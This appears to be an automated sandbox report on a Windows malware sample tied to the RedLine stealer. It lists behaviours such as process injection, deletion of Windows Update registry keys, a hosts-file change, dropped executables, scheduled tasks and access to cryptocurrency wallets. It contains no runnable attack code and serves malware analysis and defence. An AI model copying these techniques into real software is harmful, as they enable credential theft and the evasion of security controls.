Analysis Overview
SHA256
404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c
Threat Level: Known bad
The file 77d29818be0d01c38545baa0bd4551c6853c224b was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies security service
Suspicious use of NtCreateProcessExOtherParentProcess
RedLine payload
RedLine
Downloads MZ/PE file
Drops file in Drivers directory
Blocklisted process makes network request
Executes dropped EXE
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Enumerates system info in registry
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-16 13:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-16 13:38
Reported
2023-01-16 14:47
Platform
win7-20220812-en
Max time kernel
34s
Max time network
43s
Command Line
Signatures
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2032 set thread context of 1988 | N/A | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe
"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 36
Network
Files
memory/1988-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1988-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1988-62-0x0000000000401159-mapping.dmp
memory/936-63-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-16 13:38
Reported
2023-01-16 14:47
Platform
win10v2004-20220812-en
Max time kernel
155s
Max time network
158s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4992 created 4248 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3932 created 3232 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 260 created 3176 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3748 created 4008 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4100 set thread context of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1312 set thread context of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 2208 set thread context of 4804 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 364 set thread context of 3316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe
"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4100 -ip 4100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 300
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
